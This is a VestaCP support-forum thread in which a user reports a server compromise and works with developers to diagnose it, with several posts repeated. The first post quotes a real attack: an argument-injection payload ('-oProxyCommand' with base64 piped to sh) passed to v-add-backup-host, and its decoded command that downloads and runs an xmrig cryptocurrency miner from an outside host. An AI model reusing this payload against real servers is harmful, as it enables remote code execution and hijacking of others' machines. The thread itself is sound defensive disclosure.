We are happy to announce that Vesta is back under active development as of 25 February 2024. We are working on Vesta 2.0 and expect to release it by the end of 2024. Read more about it: https://vestacp.com/docs/vesta-2-development
[CLOSED] [Urgent!] Critical Security issue in VestaCP
[CLOSED] [Urgent!] Critical Security issue in VestaCP
Hi,
We have discovered what seems a security issue in VestaCP. This is what we have seen until now:
Attackers upload a file in /tmp for mining: /tmp/xmrig
We have seen this in vesta error log:
This is what this does:
We think this can be mitigated by mounting /tmp with noexec by doing this:
tmpfs /tmp tmpfs rw,nodev,nosuid,noexec 0 0
in LXC container.
We think this is important and developers should have a look asap!
We have discovered what seems a security issue in VestaCP. This is what we have seen until now:
Attackers upload a file in /tmp for mining: /tmp/xmrig
We have seen this in vesta error log:
Code: Select all
2018-06-23 01:01:40 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo Y2QgL3RtcDtwa2lsbCB4bXItc3Rhaztwa2lsbCB4bXJpZztybSAtZiB4bXJpZyB4bXItc3RhayBjcHUudHh0IHBvb2xzLnR
4dCBjb25maWcudHh0O3dnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8geG1yaWcgaHR0cHM6Ly90cmFuc2Zlci5zaC9leXo0ei94bXJpZyYmY2htb2QgK3ggeG1yaWcmJi4veG1yaWcgLS1hbGdvPWNyeXB0b25pZ2h
0IC0tdXJsPXBvb2wubWluZXhtci5jb206ODAgLS11c2VyPTQyeTFRRkJEU1ZtWFpidlpaOTVDTnBQb01kZExTNGRSUGRtaDlXZ0NSM3ZFNUQxYjJYcUdTVjVLb0JIdVBGU3VBalM3WXI3dHA0OGY5QU1WTFh1Z0R1VU1GbXA
2dWdkIC0tdGhyZWFkPSQoZ3JlcCBwcm9jZXNzb3IgL3Byb2MvY3B1aW5mb3x3YyAtbCkgLS1kb25hdGUtbGV2ZWw9MSAtLWJhY2tncm91bmQgPC9kZXYvbnVsbCAyPiYxID4vZGV2L251bGwK|base64 -d|sh" x' '****
**' [Error 15]
Code: Select all
cd /tmp;pkill xmr-stak;pkill xmrig;rm -f xmrig xmr-stak cpu.txt pools.txt config.txt;wget --no-check-certificate -qO xmrig https://transfer.sh/rysmn/xmrig&&chmod +x xmrig&&./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=$(grep processor /proc/cpuinfo|wc -l) --donate-level=1 --background </dev/null 2>&1 >/dev/null
tmpfs /tmp tmpfs rw,nodev,nosuid,noexec 0 0
in LXC container.
We think this is important and developers should have a look asap!
Last edited by jcerdan on Mon Jun 25, 2018 7:36 am, edited 2 times in total.
Re: Critical Security issue in VestaCP
Hi,
We have found this on /var/log/vesta/nginx-access.log
192.99.151.112 - - [23/Jun/2018:01:01:39 +0200] POST /api/index.php HTTP/1.1 "499" 0 "-" "curl/7.60.0" "-"
Regards,
We have found this on /var/log/vesta/nginx-access.log
192.99.151.112 - - [23/Jun/2018:01:01:39 +0200] POST /api/index.php HTTP/1.1 "499" 0 "-" "curl/7.60.0" "-"
Regards,
Re: Critical Security issue in VestaCP
Hi,
More info: Vesta was up to date:
# dpkg -l | grep vesta
ii vesta 0.9.8-21 amd64 Vesta
ii vesta-ioncube 0.9.8-21 amd64 ionCube Loader for Vesta
ii vesta-nginx 0.9.8-21 amd64 Vesta Nginx
ii vesta-php 0.9.8-21 amd64 Vesta php-fpm
ii vesta-softaculous 0.9.8-21 amd64 softaculous plugin for Vesta
regards
More info: Vesta was up to date:
# dpkg -l | grep vesta
ii vesta 0.9.8-21 amd64 Vesta
ii vesta-ioncube 0.9.8-21 amd64 ionCube Loader for Vesta
ii vesta-nginx 0.9.8-21 amd64 Vesta Nginx
ii vesta-php 0.9.8-21 amd64 Vesta php-fpm
ii vesta-softaculous 0.9.8-21 amd64 softaculous plugin for Vesta
regards
Re: Critical Security issue in VestaCP
Hi,
I have checked v-add-backup-host. I think
should be added to the section 'Verifications'.
Please, this is important. If someone at VestaCP could have a look.
Regards.
I have checked v-add-backup-host. I think
Code: Select all
is_user_format_valid()
Please, this is important. If someone at VestaCP could have a look.
Regards.
Re: [Urgent!] Critical Security issue in VestaCP
When exactly that server is installed?
Check creation date of /root/vst_install_backups folder.
Check creation date of /root/vst_install_backups folder.
Re: [Urgent!] Critical Security issue in VestaCP
Hi,
drwxr-xr-x 3 root root 4096 Apr 5 2017 vst_install_backups
Regards
drwxr-xr-x 3 root root 4096 Apr 5 2017 vst_install_backups
Regards
Re: [Urgent!] Critical Security issue in VestaCP
Can you send us nginx-access.log to dev _at_ vestacp.com ?
Also, /var/log/apache2/domains/YOUR-HOSTNAME.log will be nice if you send (apache2 or httpd folder, depending on distribution)
Also, /var/log/apache2/domains/YOUR-HOSTNAME.log will be nice if you send (apache2 or httpd folder, depending on distribution)
Re: [Urgent!] Critical Security issue in VestaCP
Hi,
I have just sent 3 logs:
vesta nginx-access.log
vesta nginx-error.log
apache <host> log
Regards
I have just sent 3 logs:
vesta nginx-access.log
vesta nginx-error.log
apache <host> log
Regards